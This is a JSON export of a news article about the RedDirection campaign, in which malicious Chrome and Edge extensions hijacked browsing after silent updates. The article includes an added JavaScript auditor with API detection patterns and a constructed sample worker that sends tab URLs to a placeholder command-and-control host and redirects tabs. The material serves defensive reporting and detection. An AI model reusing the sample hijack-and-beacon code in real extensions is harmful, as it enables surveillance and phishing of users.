{"id":3911,"date":"2025-07-09T12:26:02","date_gmt":"2025-07-09T12:26:02","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=3911"},"modified":"2025-07-09T12:26:02","modified_gmt":"2025-07-09T12:26:02","slug":"verified-featured-and-malicious-reddirection-campaign-reveals-browser-marketplace-failures","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=3911","title":{"rendered":"Verified, featured, and malicious: RedDirection campaign reveals browser marketplace failures"},"content":{"rendered":"<div>\n<div class=\"grid grid--cols-10@md grid--cols-8@lg article-column\">\n<div class=\"col-12 col-10@md col-6@lg col-start-3@lg\">\n<div class=\"article-column__content\">\n<div class=\"container\"><\/div>\n<p>A widespread browser hijacking campaign has infected over 2.3 million users through 18 malicious extensions available on Google Chrome and Microsoft Edge.<\/p>\n<p>Dubbed \u201cRedDirection\u201d by researchers at Koi Security, the operation exploited trust indicators such as verified badges, high ratings, and featured placement to remain undetected across both browser ecosystems.<\/p>\n<p>Koi researchers described the operation as one of the largest browser-based malware campaigns they have seen to date.<\/p>\n<p>Among the extensions identified, \u201cColor Picker, Eyedropper \u2014 Geco colorpick\u201d stood out with more than 100,000 installs, over 800 positive reviews, and verified status in the Chrome Web Store. 
Despite its legitimate appearance and functional user interface, the extension was found to be capturing browsing activity and sending data to remote servers.<\/p>\n<p>Other extensions offered varied functionality \u2014 from emoji keyboards and weather forecasts to VPN proxies, dark themes, and volume boosters \u2014 but all contained similar surveillance and hijacking capabilities hidden in their code.<\/p>\n<p>\u201cThis isn\u2019t some obvious scam extension thrown together in a weekend,\u201d Idan Dardikman, researcher at Koi Security, said in a blog post about the <a href=\"https:\/\/blog.koi.security\/google-and-microsoft-trusted-them-2-3-million-users-installed-them-they-were-malware-fb4ed4f40ff5\" target=\"_blank\" rel=\"noopener\">malware-infested extension<\/a>. \u201cThis is a carefully crafted trojan horse that delivers exactly what it promises, while simultaneously hijacking your browser, tracking every website you visit, and maintaining a persistent command and control backdoor.\u201d<\/p>\n<h2 class=\"wp-block-heading\">Malicious code deployed through extension updates<\/h2>\n<p>Koi researchers found that most of the malicious extensions were not harmful at the time of initial publication. Instead, they became dangerous later through version updates, a technique that allowed them to operate undetected for long periods.<\/p>\n<p>\u201cDue to how Google and Microsoft handle browser extension updates, these malicious versions auto-installed silently for over 2.3 million users across both platforms \u2014 most of whom never clicked anything,\u201d Dardikman said in the post.<\/p>\n<p>The researchers said the incident highlights the risks of supply chain compromise within browser ecosystems. 
\u201cThe very mechanisms meant to ensure user safety \u2014 verified status, featured placement, seamless updates \u2014 ended up amplifying the malware\u2019s reach,\u201d he added.<\/p>\n<p>A Google spokesperson said, \u201cCan confirm all of the extensions on the Chrome Web Store have been removed.\u201d Microsoft did not comment on the development.<\/p>\n<p>Arjun Chauhan, practice director at Everest Group, said the campaign reflects a shift in attacker strategy. \u201cUnlike traditional supply chain attacks that target backend systems, this campaign infiltrated the very tools users trust daily \u2014 their browser extensions. The delayed activation of malicious code underscores a critical gap in enterprise security models.\u201d<\/p>\n<p>He noted that initial vetting is no longer enough. \u201cOrganizations must implement continuous monitoring of browser extensions, enforce strict permission controls, and educate employees about the risks associated with seemingly trustworthy tools. Adopting a zero-trust approach to browser extensions is now imperative.\u201d<\/p>\n<h2 class=\"wp-block-heading\">Browser hijacking and phishing risks<\/h2>\n<p>According to Koi\u2019s analysis, the malicious code was embedded in each extension\u2019s background service worker and used browser APIs to monitor tab activity. 
Captured data, including URLs and unique tracking IDs, was sent to attacker-controlled servers, which in turn provided redirect instructions.<\/p>\n<p>The setup enabled several attack scenarios, including redirection to phishing pages, banking credential theft using cloned login sites, and fake update prompts delivered through hijacked meeting invitations.<\/p>\n<p>\u201cWith 2.3 million users under surveillance across 18 different extensions, the campaign creates a massive persistent man-in-the-middle capability that can be exploited at any moment,\u201d said Dardikman.<\/p>\n<h2 class=\"wp-block-heading\">Centralized infrastructure across platforms<\/h2>\n<p>The campaign spanned both Chrome and Edge, with each extension linked to its own command-and-control subdomain to create the appearance of separate actors. Researchers noted that all extensions were ultimately connected to a single coordinated network.<\/p>\n<p>Several extensions had also gained featured or verified status in both marketplaces, raising further concerns about the platforms\u2019 screening processes.<\/p>\n<p>Koi Security recommends that affected users uninstall the extensions immediately, clear browser data to remove tracking identifiers, run a full malware scan, and monitor online accounts for unusual activity. 
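<\/p>\n<p>The service-worker pattern described above (watch tab activity, beacon the URL and a tracking ID to a remote host, act on the redirect instruction that comes back) and the update-based activation described earlier can both be checked for before an extension is installed or allowed to update. The JavaScript below is an added example written for this page; it is not Koi Security\u2019s tooling and not code from the campaign. The function names are hypothetical, the two sample manifests and the sample worker source are constructed to exhibit the pattern, and the hostname in them is a placeholder.<\/p>\n

```javascript
// Added example: a static audit of a browser extension package, run before
// install or when an update arrives. It looks for (1) a background worker
// that combines tab monitoring, an outbound beacon and a redirect call and
// (2) an update that adds permissions or a background worker to a package
// that previously had neither. Hypothetical helper names; constructed data.

const SENSITIVE_PERMISSIONS = ['tabs', 'webNavigation', 'webRequest', 'scripting', 'cookies'];
const BROAD_HOST_PATTERNS = ['*://*/*', 'http://*/*', 'https://*/*'];

// One hit per group is enough; the groups together form the hijack triad.
const TAB_MONITOR_APIS = ['chrome.tabs.onUpdated', 'chrome.tabs.onActivated',
  'chrome.webNavigation.onCommitted', 'chrome.webRequest.onBeforeRequest'];
const BEACON_APIS = ['fetch(', 'XMLHttpRequest', 'navigator.sendBeacon'];
const REDIRECT_APIS = ['chrome.tabs.update', 'chrome.tabs.create'];

function isHostChar(ch) {
  return 'abcdefghijklmnopqrstuvwxyz0123456789.-'.includes(ch.toLowerCase());
}

// Collect the https:// hosts the source talks to (plain scan, no regex).
function extractHosts(src) {
  const hosts = new Set();
  let start = src.indexOf('https://');
  while (start !== -1) {
    let end = start + 8;
    while (end !== src.length && isHostChar(src[end])) end += 1;
    if (end !== start + 8) hosts.add(src.slice(start + 8, end).toLowerCase());
    start = src.indexOf('https://', end);
  }
  return [...hosts];
}

function firstHit(src, needles) {
  return needles.find((n) => src.includes(n)) || null;
}

// Does the worker source contain all three call sites of a tab hijacker?
function scanServiceWorker(src) {
  const monitors = firstHit(src, TAB_MONITOR_APIS);
  const beacons = firstHit(src, BEACON_APIS);
  const redirects = firstHit(src, REDIRECT_APIS);
  return { monitors, beacons, redirects, remoteHosts: extractHosts(src),
    hijackTriad: Boolean(monitors && beacons && redirects) };
}

// Manifest V3: permissions and hosts may also be declared as optional.
function declaredPermissions(m) {
  return [...(m.permissions || []), ...(m.optional_permissions || [])];
}
function declaredHosts(m) {
  return [...(m.host_permissions || []), ...(m.optional_host_permissions || [])];
}

function auditManifest(manifest) {
  const findings = [];
  for (const p of declaredPermissions(manifest)) {
    if (SENSITIVE_PERMISSIONS.includes(p)) findings.push('permission:' + p);
  }
  for (const h of declaredHosts(manifest)) {
    if (BROAD_HOST_PATTERNS.includes(h)) findings.push('host:' + h);
  }
  if (manifest.background && manifest.background.service_worker) findings.push('background:service_worker');
  return findings;
}

// What capability did the update add compared with the installed version?
function diffUpdate(oldManifest, newManifest) {
  const added = (a, b) => b.filter((x) => !a.includes(x));
  return {
    addedPermissions: added(declaredPermissions(oldManifest), declaredPermissions(newManifest)),
    addedHosts: added(declaredHosts(oldManifest), declaredHosts(newManifest)),
    backgroundAdded: !oldManifest.background && Boolean(newManifest.background),
  };
}

// Verdict for one package. 'high' means the worker carries the triad and the
// manifest grants what the triad needs to see tab URLs.
function assessExtension(pkg, previousManifest) {
  const worker = scanServiceWorker(pkg.serviceWorkerSource || '');
  const findings = auditManifest(pkg.manifest);
  const update = previousManifest ? diffUpdate(previousManifest, pkg.manifest) : null;
  const canSeeTabs = findings.some((f) => f === 'permission:tabs'
    || f === 'permission:webNavigation' || f.startsWith('host:'));
  let risk = 'low';
  if (worker.hijackTriad && canSeeTabs) risk = 'high';
  else if (worker.hijackTriad || (update && (update.addedPermissions.length || update.backgroundAdded))) risk = 'medium';
  return { risk, findings, worker, update };
}

// Constructed sample (not the real extension): a colour picker that shipped
// benign (v1) and grew a tab-watching worker in an update (v2).
const MANIFEST_V1 = { manifest_version: 3, name: 'Sample Color Picker', version: '1.0', permissions: ['activeTab'] };
const MANIFEST_V2 = { manifest_version: 3, name: 'Sample Color Picker', version: '1.1',
  permissions: ['activeTab', 'tabs'], host_permissions: ['*://*/*'],
  background: { service_worker: 'bg.js' } };
const WORKER_V2 = `
chrome.tabs.onUpdated.addListener((tabId, info) => {
  if (!info.url) return;
  fetch('https://updates.example-c2.test/ping', { method: 'POST', body: info.url })
    .then((r) => r.json())
    .then((d) => { if (d.redirect) chrome.tabs.update(tabId, { url: d.redirect }); });
});`;

const VERDICT_V2 = assessExtension({ manifest: MANIFEST_V2, serviceWorkerSource: WORKER_V2 }, MANIFEST_V1);
console.log(JSON.stringify(VERDICT_V2, null, 2));
```

\n<p>Run with node: the v2 package comes back high-risk because the update added the tabs permission, a broad host pattern and a background worker whose source contains all three call sites, while v1 on its own is low. The same checks applied to every update, rather than only at first review, are what catch the \u201cbenign at publication, hostile after update\u201d sequence the researchers describe.<\/p>\n<p>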
A full review of installed extensions is also advised.<\/p>\n<p>The known malicious extensions include \u201cColor Picker, Eyedropper \u2014 Geco colorpick,\u201d \u201cVPN Proxy to Unblock Discord Anywhere,\u201d \u201cEmoji keyboard online \u2014 copy&amp;paste your emoji,\u201d \u201cFree Weather Forecast,\u201d \u201cUnlock Discord,\u201d \u201cDark Theme \u2014 Dark Reader for Chrome,\u201d \u201cVolume Max \u2014 Ultimate Sound Booster,\u201d \u201cUnblock TikTok \u2014 Seamless Access with One-Click Proxy,\u201d \u201cUnlock YouTube VPN,\u201d \u201cUnlock TikTok,\u201d and \u201cWeather.\u201d <\/p>\n<h2 class=\"wp-block-heading\">Marketplace gaps and long-term risks<\/h2>\n<p>The incident underscores systemic weaknesses in browser extension governance. Google and Microsoft\u2019s verification processes failed to detect the malware, even as some of the extensions received promotional placement and trust badges.<\/p>\n<p>\u201cAttackers have successfully exploited every trust signal users rely on \u2014 verification badges, install counts, featured placement, years of legitimate operation, and positive reviews,\u201d said Dardikman. \u201cThese credibility mechanisms were turned against the users.\u201d<\/p>\n<p>Chauhan added that platform-level changes are necessary. \u201cStatic analysis and manual reviews can\u2019t keep up with today\u2019s threats. To prevent similar campaigns, Google and Microsoft must invest in dynamic analysis, real-time extension monitoring, and more transparent update processes. Strengthening these areas is essential to restoring user trust.\u201d<\/p>\n<h2 class=\"wp-block-heading\">A broader security wake-up call<\/h2>\n<p>Researchers describe the campaign as a turning point for browser security. 
Rather than relying on quick-win attacks, threat actors behind RedDirection developed a patient, long-game infrastructure, allowing them to slip under detection for years before activating the malware.<\/p>\n<p>The timing is also notable. The exposure of the campaign comes just days after MITRE added \u201c<a href=\"https:\/\/attack.mitre.org\/techniques\/T1176\/002\/\" target=\"_blank\" rel=\"noopener\">IDE Extensions<\/a>\u201d as sub-technique T1176.002 (under Software Extensions) in its ATT&amp;CK framework, drawing attention to growing threats within third-party software ecosystems.<\/p>\n<p>\u201cIf browser extensions that pass every trust test can flip into malware overnight, the security model for managing them needs to change,\u201d Dardikman said in the blog post.<\/p>\n<p>More security news:<\/p>\n<p><a href=\"https:\/\/www.csoonline.com\/article\/4016099\/second-espionage-linked-cyberattack-hits-icc-exposing-persistent-threats-to-global-justice-systems.html\">Second espionage-linked cyberattack hits ICC, exposing persistent threats to global justice systems<\/a><\/p>\n<p><a href=\"https:\/\/www.csoonline.com\/article\/4014787\/scattered-spider-shifts-focus-to-airlines-as-strikes-hit-hawaiian-westjet-and-now-qantas.html\">Scattered Spider shifts focus to airlines as strikes hit Hawaiian, WestJet \u2014 and now Qantas<\/a><\/p>\n<p><a href=\"https:\/\/www.networkworld.com\/article\/4013368\/ami-megarac-authentication-bypass-flaw-is-being-exploitated-cisa-warns.html\">AMI MegaRAC authentication bypass flaw is being exploited, CISA warns<\/a><\/p><\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>A widespread browser hijacking campaign has infected over 2.3 million users through 18 malicious extensions available on Google Chrome and Microsoft Edge. 
Dubbed \u201cRedDirection\u201d by researchers at Koi Security, the operation exploited trust indicators such as verified badges, high ratings, and featured placement to remain undetected across both browser ecosystems. Koi researchers described the operation [&hellip;]<\/p>\n","protected":false},"author":0,"featured_media":3888,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-3911","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/3911"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3911"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/3911\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/3888"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3911"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3911"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3911"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}